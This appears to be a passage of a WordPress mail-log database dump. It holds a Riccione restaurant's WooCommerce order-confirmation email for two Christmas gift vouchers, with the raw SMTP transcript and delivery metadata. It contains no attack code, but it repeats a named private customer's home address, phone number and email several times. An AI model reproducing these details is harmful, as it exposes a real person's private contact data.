Edo</p>=\r\n=0A</li>=0A<li style=3D\"margin: 0.5em 0 0; padding: 0;\">=0A<strong class=\r\n=3D\"wc-item-meta-label\" style=3D\"float: left; margin-right: .25em; clear=\r\n: both;\">Message:</strong> <p style=3D\"margin: 0;\">Buon Natale 2020</p>=\r\n=0A</li>=0A</ul>=09=09</td>=0A=09=09<td class=3D\"td\" style=3D\"color: #73=\r\n7373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertic=\r\nal-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Aria=\r\nl, sans-serif;\">=0A=09=09=091=09=09</td>=0A=09=09<td class=3D\"td\" style=\r\n=3D\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align=\r\n: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica=\r\n, Roboto, Arial, sans-serif;\">=0A=09=09=09<span class=3D\"woocommerce-Pri=\r\nce-amount amount\">100,00<span class=3D\"woocommerce-Price-currencySymbol\"=\r\n>=E2=82=AC</span></span>=09=09</td>=0A=09</tr>=0A=09=0A=09<tr class=3D\"o=\r\nrder_item\">=0A=09=09<td class=3D\"td\" style=3D\"color: #737373; border: 1p=\r\nx solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle=\r\n; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; w=\r\nord-wrap: break-word;\">=0A=09=09Buono Regalo (valore a scelta) (#coupon)=\r\n<ul class=3D\"wc-item-meta\" style=3D\"font-size: small; margin: 1em 0 0; p=\r\nadding: 0; list-style: none;\">=0A<li style=3D\"margin: 0.5em 0 0; padding=\r\n: 0;\">=0A<strong class=3D\"wc-item-meta-label\" style=3D\"float: left; marg=\r\nin-right: .25em; clear: both;\">To:</strong> <p style=3D\"margin: 0;\">Laur=\r\na e Matteo</p>=0A</li>=0A<li style=3D\"margin: 0.5em 0 0; padding: 0;\">=\r\n=0A<strong class=3D\"wc-item-meta-label\" style=3D\"float: left; margin-rig=\r\nht: .25em; clear: both;\">From:</strong> <p style=3D\"margin: 0;\">Tom e Ed=\r\no</p>=0A</li>=0A<li style=3D\"margin: 0.5em 0 0; padding: 0;\">=0A<strong=\r\n class=3D\"wc-item-meta-label\" style=3D\"float: left; margin-right: .25em;=\r\n clear: both;\">Message:</strong> <p style=3D\"margin: 0;\">Buon Natale par=\r\nents!!!</p>=0A</li>=0A</ul>=09=09</td>=0A=09=09<td class=3D\"td\" style=3D=\r\n\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: l=\r\neft; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, R=\r\noboto, Arial, sans-serif;\">=0A=09=09=091=09=09</td>=0A=09=09<td class=3D=\r\n\"td\" style=3D\"color: #737373; border: 1px solid #e4e4e4; padding: 12px;=\r\n text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\'=\r\n, Helvetica, Roboto, Arial, sans-serif;\">=0A=09=09=09<span class=3D\"wooc=\r\nommerce-Price-amount amount\">100,00<span class=3D\"woocommerce-Price-curr=\r\nencySymbol\">=E2=82=AC</span></span>=09=09</td>=0A=09</tr>=0A=09=0A=09=09=\r\n</tbody>=0A=09=09<tfoot>=0A=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=\r\n=09=09<th class=3D\"td\" scope=3D\"row\" colspan=3D\"2\" style=3D\"color: #7373=\r\n73; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; te=\r\nxt-align: left; border-top-width: 4px;\">Subtotal:</th>=0A=09=09=09=09=09=\r\n=09<td class=3D\"td\" style=3D\"color: #737373; border: 1px solid #e4e4e4;=\r\n vertical-align: middle; padding: 12px; text-align: left; border-top-wid=\r\nth: 4px;\"><span class=3D\"woocommerce-Price-amount amount\">200,00<span cl=\r\nass=3D\"woocommerce-Price-currencySymbol\">=E2=82=AC</span></span></td>=0A=\r\n=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=\r\n=09=09<th class=3D\"td\" scope=3D\"row\" colspan=3D\"2\" style=3D\"color: #7373=\r\n73; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; te=\r\nxt-align: left;\">Payment method:</th>=0A=09=09=09=09=09=09<td class=3D\"t=\r\nd\" style=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-align: m=\r\niddle; padding: 12px; text-align: left;\">PayPal</td>=0A=09=09=09=09=09</=\r\ntr>=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09<th class=\r\n=3D\"td\" scope=3D\"row\" colspan=3D\"2\" style=3D\"color: #737373; border: 1px=\r\n solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;=\r\n\">Total:</th>=0A=09=09=09=09=09=09<td class=3D\"td\" style=3D\"color: #7373=\r\n73; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; te=\r\nxt-align: left;\"><span class=3D\"woocommerce-Price-amount amount\">200,00<=\r\nspan class=3D\"woocommerce-Price-currencySymbol\">=E2=82=AC</span></span><=\r\n/td>=0A=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09</tfoot>=0A=09</table=\r\n>=0A</div>=0A=0A=0A<table id=3D\"addresses\" cellspacing=3D\"0\" cellpadding=\r\n=3D\"0\" border=3D\"0\" style=3D\"width: 100%; vertical-align: top; margin-bo=\r\nttom: 40px; padding: 0;\">=0A=09<tr>=0A=09=09<td valign=3D\"top\" width=3D\"=\r\n50%\" style=3D\"text-align: left; font-family: \'Helvetica Neue\', Helvetica=\r\n, Roboto, Arial, sans-serif; border: 0; padding: 0;\">=0A=09=09=09<h2 sty=\r\nle=3D\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Hel=\r\nvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; l=\r\nine-height: 130%; margin: 0 0 18px; text-align: left;\'>Billing address</=\r\nh2>=0A=0A=09=09=09<address class=3D\"address\" style=3D\"padding: 12px; col=\r\nor: #737373; border: 1px solid #e4e4e4;\">=0A=09=09=09=09Matteo Sandri<br=\r\n>Via Saragozza 157 Bologna<br>40135<br>Bologna<br>BOLOGNA=09=09=09=09=09=\r\n=09=09=09=09<br><a href=3D\"tel:3408565027\" style=3D\"color: #557da1; font=\r\n-weight: normal; text-decoration: underline;\">3408565027</a>=09=09=09=09=\r\n=09=09=09=09=09=09=09=09=09<br>matteo.sandri@bahlsen.it=09=09=09=09=09=\r\n=09=09</address>=0A=09=09</td>=0A=09=09=09</tr>=0A</table>=0A<p style=3D=\r\n\"margin: 0 0 16px;\">Congratulations on the sale.</p>=0A=09=09=09=09=09=\r\n=09=09=09=09=09=09=09=09=09=09</div>=0A=09=09=09=09=09=09=09=09=09=09=09=\r\n=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=\r\n=09=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=09=09=09=\r\n=09=09<!-- End Content -->=0A=09=09=09=09=09=09=09=09=09=09=09</td>=0A=\r\n=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09</table=\r\n>=0A=09=09=09=09=09=09=09=09=09<!-- End Body -->=0A=09=09=09=09=09=09=09=\r\n=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09</table>=0A=09=\r\n=09=09=09=09</td>=0A=09=09=09=09</tr>=0A=09=09=09=09<tr>=0A=09=09=09=09=\r\n=09<td align=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09<!-- Footer=\r\n -->=0A=09=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"10\" cellspac=\r\ning=3D\"0\" width=3D\"600\" id=3D\"template_footer\">=0A=09=09=09=09=09=09=09<=\r\ntr>=0A=09=09=09=09=09=09=09=09<td valign=3D\"top\" style=3D\"padding: 0; bo=\r\nrder-radius: 6px;\">=0A=09=09=09=09=09=09=09=09=09<table border=3D\"0\" cel=\r\nlpadding=3D\"10\" cellspacing=3D\"0\" width=3D\"100%\">=0A=09=09=09=09=09=09=\r\n=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=09=09<td colspan=3D\"2\" va=\r\nlign=3D\"middle\" id=3D\"credit\" style=3D\'border-radius: 6px; border: 0; co=\r\nlor: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, s=\r\nans-serif; font-size: 12px; line-height: 150%; text-align: center; paddi=\r\nng: 24px 0;\'>=0A=09=09=09=09=09=09=09=09=09=09=09=09<p style=3D\"margin:=\r\n 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>=0A=09=09=09=09=09=09=09=\r\n=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=\r\n=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=\r\n=09=09=09</tr>=0A=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09<!-- End=\r\n Footer -->=0A=09=09=09=09=09</td>=0A=09=09=09=09</tr>=0A=09=09=09</tabl=\r\ne>=0A=09=09</div>=0A=09</body>=0A</html>=0A\r\n.\r\n250 OK queued as ca26ef61-b346-43bf-bf89-595c030b46d7\r\n'),(37387,3681,'solution','All good, mail sent.'),(37388,3681,'success','1'),(37389,3681,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(37390,3681,'to_header','matteo.sandri@bahlsen.it'),(37391,3681,'reply_to_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(37392,3681,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37393,3681,'original_to','matteo.sandri@bahlsen.it'),(37394,3681,'original_subject','Your Sol Y Mar order has been received!'),(37395,3681,'original_message','<!DOCTYPE html>\n<html lang=\"en-US\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Thank you for your order</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hi Matteo,</p>\n<p style=\"margin: 0 0 16px;\">Just to let you know — we\'ve received your order #3679, and it is now being processed:</p>\n\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	[Order #3679] (24 December 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Product</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantity</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Price</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Buono Regalo (valore a scelta)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\">Laura Lucchi</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Tom e Edo</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">Buon Natale 2020</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n			<tr>\n			<td colspan=\"3\" style=\"padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n				<p style=\"margin: 0 0 16px;\">Validità 6 mesi dal momento dell\'acquisto</p>\n			</td>\n		</tr>\n		\n	<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Buono Regalo (valore a scelta)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\">Laura e Matteo</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Tom e Edo</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">Buon Natale parents!!!</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n			<tr>\n			<td colspan=\"3\" style=\"padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n				<p style=\"margin: 0 0 16px;\">Validità 6 mesi dal momento dell\'acquisto</p>\n			</td>\n		</tr>\n		\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotal:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">200,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Payment method:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Total:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">200,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Billing address</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				Matteo Sandri<br>Via Saragozza 157 Bologna<br>40135<br>Bologna<br>BOLOGNA									<br><a href=\"tel:3408565027\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">3408565027</a>													<br>matteo.sandri@bahlsen.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Thanks for using www.ristorantesolymar.it!</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(37396,3681,'original_headers','Content-Type: text/html\r\nReply-to: Sol Y Mar, ristorante a Riccione <notifiche@ristorantesolymar.it>\r\n'),(37397,3681,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n=09<thead>=0A=09=09=09<tr>=0A=09=09=09=09<th class=3D\"td\" scope=3D\"col\"=\r\n style=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-align: mid=\r\ndle; padding: 12px; text-align: left;\">Product</th>=0A=09=09=09=09<th cl=\r\nass=3D\"td\" scope=3D\"col\" style=3D\"color: #737373; border: 1px solid #e4e=\r\n4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantity<=\r\n/th>=0A=09=09=09=09<th class=3D\"td\" scope=3D\"col\" style=3D\"color: #73737=\r\n3; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; tex=\r\nt-align: left;\">Price</th>=0A=09=09=09</tr>=0A=09=09</thead>=0A=09=09<tb=\r\nody>=0A=09=09=09=09<tr class=3D\"order_item\">=0A=09=09<td class=3D\"td\" st=\r\nyle=3D\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-al=\r\nign: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvet=\r\nica, Roboto, Arial, sans-serif; word-wrap: break-word;\">=0A=09=09Buono R=\r\negalo (valore a scelta)<ul class=3D\"wc-item-meta\" style=3D\"font-size: sm=\r\nall; margin: 1em 0 0; padding: 0; list-style: none;\">=0A<li style=3D\"mar=\r\ngin: 0.5em 0 0; padding: 0;\">=0A<strong class=3D\"wc-item-meta-label\" sty=\r\nle=3D\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p st=\r\nyle=3D\"margin: 0;\">Laura Lucchi</p>=0A</li>=0A<li style=3D\"margin: 0.5em=\r\n 0 0; padding: 0;\">=0A<strong class=3D\"wc-item-meta-label\" style=3D\"floa=\r\nt: left; margin-right: .25em; clear: both;\">From:</strong> <p style=3D\"m=\r\nargin: 0;\">Tom e Edo</p>=0A</li>=0A<li style=3D\"margin: 0.5em 0 0; paddi=\r\nng: 0;\">=0A<strong class=3D\"wc-item-meta-label\" style=3D\"float: left; ma=\r\nrgin-right: .25em; clear: both;\">Message:</strong> <p style=3D\"margin: 0=\r\n;\">Buon Natale 2020</p>=0A</li>=0A</ul>=09=09</td>=0A=09=09<td class=3D\"=\r\ntd\" style=3D\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; t=\r\next-align: left; vertical-align: middle; font-family: \'Helvetica Neue\',=\r\n Helvetica, Roboto, Arial, sans-serif;\">=0A=09=09=091=09=09</td>=0A=09=\r\n=09<td class=3D\"td\" style=3D\"color: #737373; border: 1px solid #e4e4e4;=\r\n padding: 12px; text-align: left; vertical-align: middle; font-family: \'=\r\nHelvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">=0A=09=09=09<spa=\r\nn class=3D\"woocommerce-Price-amount amount\">100,00<span class=3D\"woocomm=\r\nerce-Price-currencySymbol\">=E2=82=AC</span></span>=09=09</td>=0A=09</tr>=\r\n=0A=09=09=09<tr>=0A=09=09=09<td colspan=3D\"3\" style=3D\"padding: 12px; te=\r\nxt-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', H=\r\nelvetica, Roboto, Arial, sans-serif;\">=0A=09=09=09=09<p style=3D\"margin:=\r\n 0 0 16px;\">Validit=C3=A0 6 mesi dal momento dell\'acquisto</p>=0A=09=09=\r\n=09</td>=0A=09=09</tr>=0A=09=09=0A=09<tr class=3D\"order_item\">=0A=09=09<=\r\ntd class=3D\"td\" style=3D\"color: #737373; border: 1px solid #e4e4e4; padd=\r\ning: 12px; text-align: left; vertical-align: middle; font-family: \'Helve=\r\ntica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;=\r\n\">=0A=09=09Buono Regalo (valore a scelta)<ul class=3D\"wc-item-meta\" styl=\r\ne=3D\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">=\r\n=0A<li style=3D\"margin: 0.5em 0 0; padding: 0;\">=0A<strong class=3D\"wc-i=\r\ntem-meta-label\" style=3D\"float: left; margin-right: .25em; clear: both;\"=\r\n>To:</strong> <p style=3D\"margin: 0;\">Laura e Matteo</p>=0A</li>=0A<li s=\r\ntyle=3D\"margin: 0.5em 0 0; padding: 0;\">=0A<strong class=3D\"wc-item-meta=\r\n-label\" style=3D\"float: left; margin-right: .25em; clear: both;\">From:</=\r\nstrong> <p style=3D\"margin: 0;\">Tom e Edo</p>=0A</li>=0A<li style=3D\"mar=\r\ngin: 0.5em 0 0; padding: 0;\">=0A<strong class=3D\"wc-item-meta-label\" sty=\r\nle=3D\"float: left; margin-right: .25em; clear: both;\">Message:</strong>=\r\n <p style=3D\"margin: 0;\">Buon Natale parents!!!</p>=0A</li>=0A</ul>=09=\r\n=09</td>=0A=09=09<td class=3D\"td\" style=3D\"color: #737373; border: 1px s=\r\nolid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; f=\r\nont-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">=0A=\r\n=09=09=091=09=09</td>=0A=09=09<td class=3D\"td\" style=3D\"color: #737373;=\r\n border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-al=\r\nign: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sa=\r\nns-serif;\">=0A=09=09=09<span class=3D\"woocommerce-Price-amount amount\">1=\r\n00,00<span class=3D\"woocommerce-Price-currencySymbol\">=E2=82=AC</span></=\r\nspan>=09=09</td>=0A=09</tr>=0A=09=09=09<tr>=0A=09=09=09<td colspan=3D\"3\"=\r\n style=3D\"padding: 12px; text-align: left; vertical-align: middle; font-=\r\nfamily: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">=0A=09=\r\n=09=09=09<p style=3D\"margin: 0 0 16px;\">Validit=C3=A0 6 mesi dal momento=\r\n dell\'acquisto</p>=0A=09=09=09</td>=0A=09=09</tr>=0A=09=09=0A=09=09</tbo=\r\ndy>=0A=09=09<tfoot>=0A=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09<=\r\nth class=3D\"td\" scope=3D\"row\" colspan=3D\"2\" style=3D\"color: #737373; bor=\r\nder: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-alig=\r\nn: left; border-top-width: 4px;\">Subtotal:</th>=0A=09=09=09=09=09=09<td=\r\n class=3D\"td\" style=3D\"color: #737373; border: 1px solid #e4e4e4; vertic=\r\nal-align: middle; padding: 12px; text-align: left; border-top-width: 4px=\r\n;\"><span class=3D\"woocommerce-Price-amount amount\">200,00<span class=3D\"=\r\nwoocommerce-Price-currencySymbol\">=E2=82=AC</span></span></td>=0A=09=09=\r\n=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=\r\n<th class=3D\"td\" scope=3D\"row\" colspan=3D\"2\" style=3D\"color: #737373; bo=\r\nrder: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-ali=\r\ngn: left;\">Payment method:</th>=0A=09=09=09=09=09=09<td class=3D\"td\" sty=\r\nle=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle;=\r\n padding: 12px; text-align: left;\">PayPal</td>=0A=09=09=09=09=09</tr>=0A=\r\n=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09<th class=3D\"td\"=\r\n scope=3D\"row\" colspan=3D\"2\" style=3D\"color: #737373; border: 1px solid=\r\n #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Tota=\r\nl:</th>=0A=09=09=09=09=09=09<td class=3D\"td\" style=3D\"color: #737373; bo=\r\nrder: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-ali=\r\ngn: left;\"><span class=3D\"woocommerce-Price-amount amount\">200,00<span c=\r\nlass=3D\"woocommerce-Price-currencySymbol\">=E2=82=AC</span></span></td>=\r\n=0A=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09</tfoot>=0A=09</table>=0A=\r\n</div>=0A=0A=0A<table id=3D\"addresses\" cellspacing=3D\"0\" cellpadding=3D\"=\r\n0\" border=3D\"0\" style=3D\"width: 100%; vertical-align: top; margin-bottom=\r\n: 40px; padding: 0;\">=0A=09<tr>=0A=09=09<td valign=3D\"top\" width=3D\"50%\"=\r\n style=3D\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Ro=\r\nboto, Arial, sans-serif; border: 0; padding: 0;\">=0A=09=09=09<h2 style=\r\n=3D\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helve=\r\ntica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; lin=\r\ne-height: 130%; margin: 0 0 18px; text-align: left;\'>Billing address</h2=\r\n>=0A=0A=09=09=09<address class=3D\"address\" style=3D\"padding: 12px; color=\r\n: #737373; border: 1px solid #e4e4e4;\">=0A=09=09=09=09Matteo Sandri<br>V=\r\nia Saragozza 157 Bologna<br>40135<br>Bologna<br>BOLOGNA=09=09=09=09=09=\r\n=09=09=09=09<br><a href=3D\"tel:3408565027\" style=3D\"color: #557da1; font=\r\n-weight: normal; text-decoration: 